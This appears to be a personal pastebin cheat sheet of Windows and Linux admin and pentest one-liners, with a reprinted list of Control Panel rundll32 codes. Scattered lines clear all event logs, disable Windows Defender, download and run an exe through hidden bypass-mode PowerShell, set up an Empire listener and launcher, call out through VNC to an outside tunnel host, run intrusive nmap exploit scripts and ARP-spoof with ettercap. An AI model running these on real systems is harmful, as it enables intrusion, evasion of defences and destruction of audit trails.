· 6 years ago · Apr 03, 2019, 08:40 PM
1#RMCURDY COMMAND FU LIST
2
3#list USB info and speeds
4
5dmesg | grep " usb [0-9]" |less ;for i in `find /sys/bus/usb/devices -iname "usb*" ` ;do echo $i ;cat $i/speed ;done
6
7
8#powershell wipe all event logs
9powershell -command " wevtutil el | Foreach-Object {Write-Host "Clearing $_"; wevtutil cl "$_"} "
10
11#powershell to get external IP
12powershell -command "$(Resolve-DnsName -Name myip.opendns.com -Server 208.67.222.220).IPAddress
13
14# dump non common services > CSV
15powershell -command " $service = get-wmiobject -query 'select * from win32_service'; echo $service.pathname |select-string -Pattern 'system32|c:\windows\system32|TrustedInstaller|SysWow64' -NotMatch | export-csv "$env:TEMP\out.csv" -nti |start "$env:TEMP\out.csv" "
16
17# (better ?) dump running services to CSV
18wmic service where (state="running") get name, Pathname /format:csv|find /V /I "System" > out.csv & start out.csv
19
20
21#expand svchost.exe
22tasklist /FO CSV /svc /fi "imagename eq svchost.exe" > svchost.csv
23
24
25# buncha WMI
26Spot Odd Executables - wmic PROCESS WHERE "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath
27Look at services that are set to start automatically - wmic SERVICE WHERE StartMode="Auto" GET Name, State
28Find user-created shares (usually not hidden) - wmic SHARE WHERE "NOT Name LIKE '%$'" GET Name, Path
29Find stuff that starts on boot - wmic STARTUP GET Caption, Command, User
30Identify any local system accounts that are enabled (guest, etc.) - wmic USERACCOUNT WHERE "Disabled=0 AND LocalAccount=1" GET Name"
31Change Start Mode of Service - wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled
32Number of Logons Per USERID - wmic netlogin where (name like "%skodo") get numberoflogons
33Obtain a Certain Kind of Event from Eventlog - wmic ntevent where (message like "%logon%") list brief
34Clear the Eventlog (Security example) - wmic nteventlog where (description like "%secevent%") call cleareventlog
35Get Mac Address - wmic nic get macaddress
36Reboot or Shutdown - wmic os where buildnumber="2600" call reboot
37Update static IP address - wmic nicconfig where index=9 call enablestatic("192.168.16.4"), ("255.255.255.0")
38Change network gateway - wmic nicconfig where index=9 call setgateways("192.168.16.4", "192.168.16.5"),(1,2)
39Enable DHCP - wmic nicconfig where index=9 call enabledhcp
40Service Management - wmic service where caption="DHCP Client" call changestartmode "Disabled"
41Start an Application - wmic process call create "calc.exe"
42Terminate an Application - wmic process where name="calc.exe" call terminate
43Change Process Priority - wmic process where name="explorer.exe" call setpriority 64
44Get List of Process Identifiers - wmic process where (Name='svchost.exe') get name,processid
45Information About Harddrives - wmic logicaldisk where drivetype=3 get name, freespace, systemname, filesystem, size, volumeserialnumber
46Information about os - wmic os get bootdevice, buildnumber, caption, freespaceinpagingfiles, installdate, name, systemdrive, windowsdirectory /format:htable > c:osinfo.htm
47Information about files - wmic path cim_datafile where "Path='windowssystem32wbem' and FileSize>1784088" > c:wbemfiles.txt
48Process list - wmic process get /format:htable > c:process.htm
49Retrieve list of warning and error events not from system or security logs - WMIC NTEVENT WHERE "EventType<3 AND LogFile != 'System' AND LogFile != 'Security'" GET LogFile, SourceName, EventType, Message, TimeGenerated /FORMAT:"htable.xsl":" datatype = number":" sortby = EventType" > c:appevent.htm
50Total Hard Drive Space Check - wmic LOGICALDISK LIST BRIEF
51Get Running Services Information - Wmic service where (state=â€Ârunningâ€Â) get caption, name, startmode, state
52Get Startmode of Services - Wmic service get caption, name, startmode, state
53Get Domain Names And When Account PWD set to Expire - WMIC UserAccount GET name,PasswordExpires /Value
54Get Hotfix and Security Patch Information - WMIC QFE GET /format:CSV >QFE.CSV
55Get Startup List - wmic startup list full
56Find a specific Process - wmic process list brief - find "cmd.exe"
57Get List of IP Interfaces - wmic nicconfig where IPEnabled='true'
58Change IP Address - wmic nicconfig where Index=1 call EnableStatic ("10.10.10.10"), ("255.255.255.0")
59OS/System Report HTML Formatted - wmic /output:c:os.html os get /format:hform
60Products/Programs Installed Report HTML Formatted - wmic /output:c:product.html product get /format:hform
61Services Report on a Remote Machine HTML Formatted - wmic /output:c:services.htm /node:server1 service list full / format:htable
62Turn on Remoted Desktop Remotely! - Wmic /node:"servername" /user:"user@domain" /password: "password"
63RDToggle where ServerName="server name" call SetAllowTSConnections 1
64Get Server Drive Space Usage Remotely - WMIC /Node:%%A LogicalDisk Where DriveType="3" Get DeviceID,FileSystem,FreeSpace,Size /Format:csv MORE /E +2 >> SRVSPACE.CSV
65Get PC Serial Number - wmic /node:â€ÂHOST†bios get serialnumber
66Get PC Product Number - wmic /node:â€ÂHOST†baseboard get product
67Get Services for Remote Machine in HTML Format - wmic /output:c:services.htm /node:server1 service list full / format:htable
68
69
70# packet captures in windows! sort of ... pcap windows
71
72$timestamp = Get-Date -f yyyy-MM-dd_HH-mm-ss
73New-NetEventSession -Name Session1 -LocalFilePath c:\$env:computername-netcap.etl -MaxFileSize 512
74
75Add-NetEventPacketCaptureProvider -SessionName Session1
76Start-NetEventSession -Name Session1
77
78Start-Sleep -s 15
79
80#Stop a Capture Session
81Stop-NetEventSession -Name Session1
82#Remove Capture Session
83Remove-NetEventSession -Name Session1
84
85
86
87$s = New-PefTraceSession -Path “$env:computername-netcap.etl.Cap†-SaveOnStop
88$s | Add-PefMessageProvider -Provider “$env:computername-netcap.etlâ€Â
89$s | Start-PefTraceSession
90
91
92
93
94#action center enable
95Reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ImmersiveShell" /v "UseWin32BatteryFlyout" /t REG_DWORD /d "1" /f
96Reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\MTCUVC" /v "EnableMtcUvc" /t REG_DWORD /d "0" /f
97reg add "HKCU\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 0 /f
98
99
100# wmic dump dns
101FOR /F "delims==" %%A IN ('type ips.txt') DO wmic /Node:%%A >wmic nicconfig where "IPEnabled = 'TRUE' and DNSDomain IS NOT NULL" get DNSHostName,DefaultIPGateway, DHCPServer, DNSDomain, DNSHostName, DNSServerSearchOrder, IPAddress, IPSubnet, MACAddress, WINSEnableLMHostsLookup, WINSPrimaryServer, WINSSecondaryServer /format:list >> \\pmfile02\knox\RMCCURDY\dns.txt
102
103#powershell dump DNS info for all on domain
104ForEach ($Computer In Get-ADComputer -Filter * -Properties *)
105{
106 Try
107 {
108
109Get-WmiObject -ComputerName $Computer.Name -Namespace root\cimv2 -Query "Select dnsserversearchorder from win32_networkadapterconfiguration" | where {$_.DNSServerSEarchOrder -ne $null} | select -ExpandProperty DNSServerSearchOrder
110Get-ADComputer -Identity $Computer.Name -Properties Name, operatingSystem |Select Name, operatingSystem
111
112
113
114 }
115 Catch
116 {
117 $Computer.Name + " not in AD"
118 }
119}
120
121#7zip folder with exclude files
1227z a -tzip archive.zip usb -mx0 '-xr!DERP.tar.gz'
123
124
125# powershell to dump AD info on managers etc
126Get-ADOrganizationalUnit -filter * -Properties DistinguishedName | get-aduser -filter * -properties * |select EmailAddress,title,Company,samaccountname,office,displayname,@{Name = "Manager";Expression = {%{(Get-AdUser $_.Manager -Properties DisplayName).DisplayName}}}| export-csv "$env:TEMP\list.csv" -nti
127start "$env:TEMP\list.csv"
128
129
130
131# dump info using direct X
132dxdiag /dontskip /whql:off /64bit /t c:\dxdiag.txt
133systeminfo >> c:\dxdiag.txt
134
135# empire new syntax
136./reset.sh
137listeners
138uselistener http_com
139set Port 143
140execute
141launcher powershell http_com
142
143
144
145#SSH keys in 2 easy steps
146ssh-keygen
147cat ~/.ssh/id_rsa.pub | ssh remote_user@remote.example.com "cat >> ~/.ssh/authorized_keys"
148
149#remove sample files
150find /media/data/TV /media/data/MOVIES /media/moredata/MOVIES -iname "*sample*" -exec rm -f '{}' \;
151
152# remove all files but what is in the whitelist (DANGER DO NOT RUN THIS ON THE WRONG PATH)
153find /media/data/TV /media/data/MOVIES /media/moredata/MOVIES -regextype egrep -type f ! -iregex '.*\.(avi|mpg|mov|flv|wmv|asf|mpeg|m4v|divx|mp4|mkv|sub|iso|264|vob|srt|img)$' -exec rm -Rf '{}' \;
154
155# remove empty folders (DANGER DO NOT RUN THIS ON THE WRONG PATH)
156find /media/data/TV /media/data/MOVIES /media/moredata/MOVIES -depth -empty -type d -exec rmdir {} \;
157
158
159
160# todo ... find randomly named files and name them the name of the parrent folder .
161# ./Real.Movie.Name.Here.2017/gfaslrinaoenadftravaa.mkv
162# becomes
163# ./Real.Movie.Name.Here.2017/Real.Movie.Name.Here.2017.mkv
164
165# display files likly to be random but dont delete them
166# this sucks find /media/data/TV /media/data/MOVIES /media/moredata/MOVIES -regextype egrep -type f -iregex '.*\.(avi|mpg|mov|flv|wmv|asf|mpeg|m4v|divx|mp4|mkv|iso|264|vob|img)$' | egrep '.*\/([A-Z])\w+\....$'
167
168
169
170#fix random file names to parrent folder W00T sure there is a way to do this with regex/find but not sure ...
171# fixed to escape to single quotes
172# fixed to add missing forward slash
173find /media/data/MOVIES/ |grep -E "([A-Z|a-z|0-9]{17,30})" | sed -r 's/(\/media\/data\/MOVIES\/)(.*)(\/.*)(\....)/mv '\''\1\2\3\4'\'' '\''\1\2\/\2\4'\''/g' > tmp
174
175bash -x tmp
176
177
178
179
180
181
182#disable update urls for all chrome extensions ( this is for annoying plugins that update too often and protects against watering hole attacks! )
183find / -iname "manifest.json" -exec sed 's/\"update_url\": \"http/\"update_url\": \"hxxp/g' -i.bak '{}' \;
184
185
186# find lossy mp3's finds less then 192 basically ..
187find AUSTIN/ . -type f -iname "*.mp3" -print0|xargs -0 -n1 file|perl -e 'for(<stdin>){/(.*mp3).*?(\d+) kbps/;print "$1 $2\n" if ($2<192);}' > txt.txt
188# cats and just shows the path/count
189cat txt.txt | sed -r 's/(^.*\/\b)(.*)/\1/g' | uniq -c | sort -rn
190
191
192# create a bunch of interfaces and get a IP for them to do scans though :P
193for i in `seq 1 9`
194do
195
196ip link add link enp0s25 address 00:11:11:11:11:0$i enp0s25.$i type macvlan
197
198sleep 1
199dhclient enp0s25.$i
200done
201
202
203# nmap vuln scanner
204nmap -v -d1 -sV --script-args=unsafe=1 --script-args=unsafe --script "(auth or brute or discovery or exploit or external or fuzzer or intrusive or malware or safe or version or vuln) and not(smb-brute or http-slowloris or http-brute or http-enum or http-form-fuzzer or broadcast-avahi-dos or smb-flood or dns-fuzz or http-form-brute or http-iis-short-name-brute or http-fileupload-exploiter or vnc-brute or http-fileupload-exploiter or dos)" -oA nse_full_try2 25.0.0.151
205
206
207
208
209
210rem get the sids dump sids in
211for /f "tokens=8 delims=\ " %%i IN ('reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList"') do (
212set "a=HKEY_USERS\%%i\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\"
213set b=company.harepoint.com
214reg add "%a%%b%" /v http /t REG_DWORD /d 2 /f 2> %temp%/null
215reg add "%a%%b%" /v https /t REG_DWORD /d 2 /f 2> %temp%/null
216)
217
218
219
220net use /del p:
221net use p: "https://company.sharepoint.com/Audit & Compliance/Shared Documents/"
222
223
224
225
226
227# quick check site
228https://www.siteuptime.com/users/quickcheck.php?HostName=p48sec04.paymetric.com&Domain=&Content=&ServiceId=9&Locations%5B1%5D=on&Locations%5B4%5D=on&Locations%5B13%5D=on&Action=Check
229
230# ssl cert database
231https://crt.sh/?q=%25.rmccurdy.com
232
233# google drive hosted massive recon database
234https://www.censys.io/ipv4?q=paymetric.com
235
236
237
238# borg backup prune
239borg prune -v --list --keep-within=30d /media/backup/ROOT/ -n
240
241# Mount 365 share over SMB https
242set "a=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\"
243set b=company.sharepoint.com
244reg add "%a%%b%" /v http /t REG_DWORD /d 2 /f >nul 2>nul
245reg add "%a%%b%" /v https /t REG_DWORD /d 2 /f >nul 2>nul
246
247#reboot
248
249net use p: "https://company.sharepoint.com/Audit%20%26%20Compliance/Shared%20Documents/"
250
251
252# safe mode
253
254Safe Mode with Networking:
255bcdedit /set {default} safeboot network
256
257Once Command Prompt is open, execute this command:
258bcdedit /deletevalue {default} safeboot
259
260# windows update broken
261REG ADD “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU†/v UseWUServer /t REG_DWORD /d 0 /f
262net stop “Windows Updateâ€Â
263net start “Windows Updateâ€Â
264
265# disable IPV6 mostly ...
266reg add HKLM\SYSTEM\CurrentControlSet\Services\Tcpip6\Parameters /v DisabledComponents /t REG_DWORD /d 0x000000FF
267netsh interface ipv6 set global ramonizeidentifers=disable
268netsh interface ipv6 set privacy state=disable
269
270# derp
271
272@adon90 I just use lajit bins like VNC winvnc -autoreconnect -id:%ID% -connect tunnel.rmccurdy.com::3389 -run
273or powershell for the lulz http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-5.html
274that's old but you get the point DNS tunnels always work for init all persistence you can go with NPS.zip if powershell is blocked https://github.com/Ben0xA/nps or try puppy https://github.com/n1nj4sec/pupy
275
276
277# nmap breakout @mubix brakesec slack
278letmeoutofyour.net
279
280# some curl fu I ended up not using uses gzip and finds the highest value line
281curl --compressed -i -s -k -X $'GET' -H $'Host: 25.0.0.151' -H $'Accept-Encoding: gzip, deflate' $'http://25.0.0.151/zm/index.php?view=events&page=&reload=0&execute=0&action=&subaction=&line=&fid=&filterName=WIPEALLEVENTS&filter%5Bterms%5D%5B0%5D%5Battr%5D=DateTime&filter%5Bterms%5D%5B0%5D%5Bop%5D=%3C&filter%5Bterms%5D%5B0%5D%5Bval%5D=now&sort_field=DateTime&sort_asc=1&limit=&AutoExecuteCmd=' | grep "colTotScore\">[0-9]" | sed -r 's/(.*ore\">)(.*)(<\/td>)/\2/g' | awk '{if(max<$1){max=$1;line=$1}}END{print line}'
282
283# Chrome Plugins ... Really .. no way to restore plugins at all ...
284
285Chrome Plugins:
286
287https://chrome.google.com/webstore/detail/pkehgijcmpdhfbdbbnkijodmdjhbjlgp
288https://chrome.google.com/webstore/detail/ghnomdcacenbmilgjigehppbamfndblo
289https://chrome.google.com/webstore/detail/ghbmnnjooekpmoecnnnilnnbdlolhkhi
290https://chrome.google.com/webstore/detail/apdfllckaahabafndbhieahigkjlhalf
291https://chrome.google.com/webstore/detail/lmjegmlicamnimmfhcmpkclmigmmcbeh
292https://chrome.google.com/webstore/detail/pbjikboenpfhbbejgkoklgkhjpfogcam
293https://chrome.google.com/webstore/detail/gnaepfhefefonbijmhcmnfjnchlcbnfc
294https://chrome.google.com/webstore/detail/kemfccojgjoilhfmcblgimbggikekjip
295https://chrome.google.com/webstore/detail/nbkekaeindpfpcoldfckljplboolgkfm
296https://chrome.google.com/webstore/detail/nckgahadagoaajjgafhacjanaoiihapd
297https://chrome.google.com/webstore/detail/ffhkkpnppgnfaobgihpdblnhmmbodake
298https://chrome.google.com/webstore/detail/bfbameneiokkgbdmiekhjnmfkcnldhhm
299https://chrome.google.com/webstore/detail/hdokiejnpimakedhajhdlcegeplioahd
300https://chrome.google.com/webstore/detail/odldmflbckacdofpepkdkmkccgdfaemb
301https://chrome.google.com/webstore/detail/kcnhkahnjcbndmmehfkdnkjomaanaooo
302https://chrome.google.com/webstore/detail/ehfdcgbfcboceiclmjaofdannmjdeaoi
303https://chrome.google.com/webstore/detail/dhdgffkkebhmkfjojejmpbldmpobfkfo
304https://chrome.google.com/webstore/detail/cjpalhdlnbpafiamejdnhcphjbkeiagm
305https://chrome.google.com/webstore/detail/boadgeojelhgndaghljhdicfkmllpafd
306https://chrome.google.com/webstore/detail/abjcfabbhafbcdfjoecdgepllmpfceif
307https://chrome.google.com/webstore/detail/pibndofbpkoaipoidbkephfhhnapkccn
308
309Grease (Tamper) Monkey Scripts:
310
311https://greasyfork.org/en/scripts/735-anti-adblock-killer-reek?lipi=urn%3Ali%3Apage%3Ad_flagship3_pulse_read%3B8BiCR9cxQUi0F11hC370NQ%3D%3D
312https://greasyfork.org/en/scripts/5566-youtube-links
313
314
315
316#aws amazon notes
317https://protoxin.net/s3/
318https://github.com/nccgroup/scout2
319
320https://github.com/dagrz/aws_pwn/blob/master/README.md
321
322#TRONSCRIPT !
323goto https://bmrf.org/repos/tron/ and get the filename of the exe and replace the file name in the url below
324
325#TRONSCRIPT NO AV !
326goto https://bmrf.org/repos/tron/ and get the filename of the exe and replace the file name in the url below
327
328powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://www.rmccurdy.com/tronscript.exe',\"%userprofile%\desktop\tron.exe\"); Start-Process \"%userprofile%\desktop\tron.exe\" -ArgumentList \"-o%userprofile%\desktop\" -Wait ;Start-Process \"%userprofile%\desktop\tron\tron.bat\" -ArgumentList \"-a -sa -sd\""
329
330
331# full tronscript RUNS AV !
332powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://www.rmccurdy.com/tronscript.exe',\"%userprofile%\desktop\tron.exe\"); Start-Process \"%userprofile%\desktop\tron.exe\" -ArgumentList \"-o%userprofile%\desktop\" -Wait ;Start-Process \"%userprofile%\desktop\tron\tron.bat\""
333
334
335
336# disable windows defender
337REG add "HKLM\SYSTEM\CurrentControlSet\services\WinDefend" /v Start /t REG_DWORD /d 4 /f
338
339REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
340
341New-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -PropertyType DWord -Value 1 -force
342
343
344rsync git
345
346cd
347apt-get --purge rsync
348apt-get install git automake -y
349
350git clone git://git.samba.org/rsync.git
351
352cd rsync
353./configure
354make
355make install
356
357Now you can have great progress info!
358
359rsync --info=progress2 SOURCE DST
360
361rsync --info=progress2 --delete -r /media/moredata/BACKUP_DUMP/ /media/backup/BACKUP_DUMP/
362
363man rsync for what Parc options mean
364
365
366
367# auth to ironports :P
368echo 10.4.208.29 ironport9p1 >> /etc/hosts
369curl -i -s -k -L -X $'GET' -H $'Upgrade-Insecure-Requests: 1' --ntlm --negotiate -u "ugrm245:YOURPASSWORD" "http://ironport9p1/B0000D0000N0001N0000F0000S0000R0004/"`ip address show | grep '\b10\.' | sed -e 's/.*inet //g' -e 's/\/.*//g'`"/http://go.com/"
370
371
372# tor email
373i'd just create an account at https://protonmail.com/ and use tor browser bundle
374A
375cirrus
376operat0r: try https://protonirockerxow.onion, or http://torbox3uio6wchz.onion, or there’s also http://bitmailendavkbec.onion (but you need an existing email for that one).
377
378#Enable ICS over command line and powershell ?
379
380Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Network Connections" /v NC_ShowSharedAccessUI /t reg_dword /d 1 /f
381
382
383powershell
384regsvr32 hnetcfg.dll
385
386$m = New-Object -ComObject HNetCfg.HNetShare
387$m.EnumEveryConnection |% { $m.NetConnectionProps.Invoke($_) }
388$c = $m.EnumEveryConnection |? { $m.NetConnectionProps.Invoke($_).Name -eq "WIFI" }
389$config = $m.INetSharingConfigurationForINetConnection.Invoke($c)
390Write-Output $config.SharingEnabled
391Write-Output $config.SharingType
392$config.EnableSharing(1)
393
394
395
396$config.DisableSharing()
397
398
399
400
401
402# excel show hperlink URL
403Function GetURL(cell As range, _
404Optional default_value As Variant)
405'Lists the Hyperlink Address for a Given Cell
406'If cell does not contain a hyperlink, return default_value
407If (cell.range("A1").Hyperlinks.Count <> 1) Then
408GetURL = default_value
409Else
410GetURL = cell.range("A1").Hyperlinks(1).Address & "#" & cell.range("A1").Hyperlinks(1).SubAddress
411End If
412End Function
413
414
415
416## heartbleed nmap
417nmap --script ssl-heartbleed --script-args vulns.showall -sV -iL in -v --open -d2 | tee out.txt
418egrep "(report for |: VULNERABLE)" -A 2 out.txt
419
420# grep for ip addres and pull it out
421grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}'
422
423
424#nmap search for null sessions
425nmap -v -p445 --script=smb-os-discovery -iL in1 -oA in1_smb-os-discovery -d2 -T2 -n -vv | tee -a debug.txt
426grep "<blank> succeeded" debug.txt | awk '{print $4,$11,$12}' | sort -u | grep succeeded | sort -u
427
428
429# nmap SMB checks
430
431nmap -PS445 -p445 --script=smb-os-discovery,smbv2-enabled,smb-enum-shares,smb-ls --script-args=ls.maxdepth=10 -iL in2_234 -oA in2_234 -vv -d2 -T5
432
433
434# rsync
435a
436
437sync -P --info=progress2 -r -e 'ssh -p 443' plex@25.0.0.151:/media/moredata/BACKUP_DUMP/usb/ ./usb/
438
439
440//## find modded files in the last 7 days and save them to csv
441Get-ChildItem c:\windows\ -recurse -Include *.*| Where{$_.LastWriteTime -gt (Get-Date).AddDays(-7)} | Export-Csv -Path moddedfiles.csv -Encoding ascii -NoTypeInformation
442
443
444
445#nmap for for windows and smb ls
446
447nmap -PS445 -p445 --script=smb-os-discovery,smbv2-enabled,smb-enum-shares,smb-ls --script-args=ls.maxdepth=10 10.49.211.99
448
449
450#nikto all in mostly
451
452apt install libnet-ssleay-perl -y
453git clone https://github.com/sullo/nikto.git
454nikto
455./nikto.pl -C none -Tuning x02589abc -timeout 1 -host digitalinvoicing.net -port+ 443 -output /tmp/1.csv
456
457
458
459# use nikto though a proxy with verbose output (tested with ZAP )
460./nikto.pl -C none -Tuning x02589abc -timeout 1 -host "http://site12333.com/TERT/" -output 4.csv -Display V -useproxy http://localhost:8080 | tee -a 5
461
462
463#git pull for nmap ...
464
465apt-get update
466apt-get remove --purge nmap -y
467apt-get install libssl-dev automake build-essential libpcap-dev git -y
468cd /tmp
469rm -Rf /tmp/nmap
470git clone https://github.com/nmap/nmap.git
471cd nmap
472./configure && make install
473
474
475# dns hijack that does not work
476dnsspoof
477ettercap -T -M ARP /10.50.2.111// /10.0.0.1//
478# hex value of the garget IP
479iptables --append FORWARD --match string --algo kmp --hex-string '|0a 04 dc 14|' --jump DROP
480
481
482#make other outlook attached mailboxes keep the sent item in the attached mailboxes flder
483Reg add HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Outlook\Preferences /v DelegateSentItemsStyle /t reg_dword /d 1 /f
484
485
486# sudousers file
487update-alternatives --config editor
488
489
490# smbv1 disable
491Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
492
493# FTP
494lftp -c "open 123.456.789.100 && find -l && exit" > listing.txt
495ncftpls -R
496
497
498#LOOKUPS=
499
500=DLookUp("[Asset Names]","[VARTOP]","[SERVERNAME]=[Asset Names]")
501
502IF=
503
504=IIf([Version]<"2016-07-02","Yes",IIf([Version]>"2016-07-02","No",IIf(IsNull([Version]),"Yes","[Version]")))
505
506
507
508# copy random mp3s from /media/data/MUSIC/RTORRENT/ to /s/
509find /media/data/MUSIC/RTORRENT/ -type f -iname "*.mp3" |shuf |head -n 5000 |xargs -d$'\n' -I{} cp -v {} /s/
510
511# remove files under 1 meg ( likly not MP3's ... )
512find /s/ -size -1M -type f -iname "*.mp3" -exec rm '{}' \;
513
514
515# rename all the files to random file names because some wonky file names break mp3 player...
516cd /s/
517IFS=$'\n';for fname in `ls /s/*.mp3`; do mv "$fname" "$RANDOM$RANDOM.mp3" ;done
518
519
520
521
522#systemd sucks
523systemctl enable getty@tty2
524
525cat /etc/systemd/system/getty@tty1.service.d/autologin.conf
526[Service]
527ExecStart=
528ExecStart=-/sbin/agetty -a root --noclear %I linux
529
530
531
532
533cat PLEXPY.service
534[Unit]
535Description=PLEXPY STARTUP
536After=network.target
537
538[Service]
539User=plex
540Group=adm
541
542Type=simple
543ExecStart=/bin/bash -c '\
544cd /home/plex/plexpy ; \
545git pull -f ; \
546python PlexPy.py'
547
548
549TimeoutStopSec=99
550
551[Install]
552WantedBy=multi-user.target
553
554
555
556# yay systemd
557export varsystemd=DARKNET.service
558
559systemctl enable $varsystemd
560systemctl daemon-reload
561systemctl stop $varsystemd
562sleep 2
563systemctl start $varsystemd
564sleep 2
565systemctl status $varsystemd
566journalctl -f -t $varsystemd
567
568
569
570
571
572# ALL THE command line stuff for unas control panel
573
574Shelling Control Panel Applets and System Wizards
575Name: Shelling Control Panel Applets and System Wizards
576Author: Karl Peterson
577Date: August 12, 1998
578Level: All
579Credits: Thanks go out to Karl Peterson for allowing me to reprint this useful information. You can find this and other items on his excellent One Stop Source Shop web site.
580
581Shelling Control Panel Applets and System Wizards
582An infrequent but recurring question in online discussion groups goes along the lines of, "How do I call up the Control Panel time/date (substitute wallpaper, mouse, whatever) dialog from VB?" Frequently this is accompanied with wonder about how to force the VB app to wait until the user makes their desired choices and dismisses the dialog. Listed below are all the codes required to call most of the Control Panel applets. I've collected these over the years from various online postings, but since new applets are always being added would appreciate hearing of any you could contribute to grow the list!
583
584Check it out:
585
586Use the following snippet to Shell the date/time dialog.
587Substitute the codes below for other Control Panel dialogs.
588
589 Option Explicit
590
591 Private Sub SetDateTime()
592 Call Shell("rundll32.exe shell32.dll,Control_RunDLL timedate.cpl")
593 End Sub
594
595Couldn't be much easier, could it? The only trick is knowing the "secret code" for each dialog. Now, while the above will bring up the date/time dialog, your VB app will have no way of knowing when that dialog has been dismissed. For the answer to that, go to my Samples page and download Shell32.zip which shows several methods you can use to "shell and wait."
596
597So, what are the secret codes? Here ya go...
598
599Control Panel (CONTROL.EXE)
600Control Panel:
601
602 rundll32.exe shell32.dll,Control_RunDLL
603
604Accessability Settings (ACCESS.CPL)
605Accessability Properties (Keyboard):
606
607 rundll32.exe shell32.dll,Control_RunDLL access.cpl,,1
608
609Accessability Properties (Sound):
610
611 rundll32.exe shell32.dll,Control_RunDLL access.cpl,,2
612
613Accessability Properties (Display):
614
615 rundll32.exe shell32.dll,Control_RunDLL access.cpl,,3
616
617Accessability Properties (Mouse):
618
619 rundll32.exe shell32.dll,Control_RunDLL access.cpl,,4
620
621Accessability Properties (General):
622
623 rundll32.exe shell32.dll,Control_RunDLL access.cpl,,5
624
625Add/Remove Programs (APPWIZ.CPL)
626Add/Remove Programs Properties (Install/Uninstall):
627
628 rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,1
629
630Add/Remove Programs Properties (Windows Setup):
631
632 rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,2
633
634Add/Remove Programs Properties (Startup Disk):
635
636 rundll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,3
637
638Display Settings (DESK.CPL)
639Display Properties (Background):
640
641 rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,0
642
643Display Properties (Screen Saver):
644
645 rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,1
646
647Display Properties (Appearance):
648
649 rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,2
650
651Display Properties (Settings):
652
653 rundll32.exe shell32.dll,Control_RunDLL desk.cpl,,3
654
655Display Properties (Install Screen Saver):
656
657 rundll32.exe desk.cpl,InstallScreenSaver %1
658 (opens .scr at location specified by %1 in preview window)
659
660FindFast Settings (FINDFAST.CPL)
661Find Fast Properties (General):
662
663 rundll32.exe shell32.dll,Control_RunDLL findfast.cpl
664
665Internet Settings (INETCPL.CPL)
666Internet Properties (General):
667
668 rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,0
669
670Internet Properties (Security):
671
672 rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,1
673
674Internet Properties (Content):
675
676 rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,2
677
678Internet Properties (Connection):
679
680 rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,3
681
682Internet Properties (Programs):
683
684 rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,4
685
686Internet Properties (Advanced):
687
688 rundll32.exe shell32.dll,Control_RunDLL inetcpl.cpl,,5
689
690Regional Settings (INTL.CPL)
691Regional Settings Properties (Regional Settings):
692
693 rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,0
694
695Regional Settings Properties (Number):
696
697 rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,1
698
699Regional Settings Properties (Currency):
700
701 rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,2
702
703Regional Settings Properties (Time):
704
705 rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,3
706
707Regional Settings Properties (Date):
708
709 rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,4
710
711Regional Settings Properties (Input Locales):
712
713 rundll32.exe shell32.dll,Control_RunDLL intl.cpl,,5
714
715Joystick Settings (JOY.CPL)
716Joystick Properties (Joystick):
717
718 rundll32.exe shell32.dll,Control_RunDLL joy.cpl
719
720Mouse/Keyboard/Printers/Fonts Settings (MAIN.CPL)
721Mouse Properties:
722
723 rundll32.exe shell32.dll,Control_RunDLL main.cpl @0
724
725Keyboard Properties:
726
727 rundll32.exe shell32.dll,Control_RunDLL main.cpl @1
728
729Printers:
730
731 rundll32.exe shell32.dll,Control_RunDLL main.cpl @2
732
733Fonts:
734
735 rundll32.exe shell32.dll,Control_RunDLL main.cpl @3
736
737Mail and Fax Settings (MLCFG32.CPL)
738Microsoft Exchange/Outlook Properties (General):
739
740 rundll32.exe shell32.dll,Control_RunDLL mlcfg32.cpl
741
742Multimedia/Sounds Settings (MMSYS.CPL)
743Multimedia Properties (Audio):
744
745 rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,0
746
747Multimedia Properties (Video):
748
749 rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,1
750
751Multimedia Properties (MIDI):
752
753 rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,2
754
755Multimedia Properties (CD Music):
756
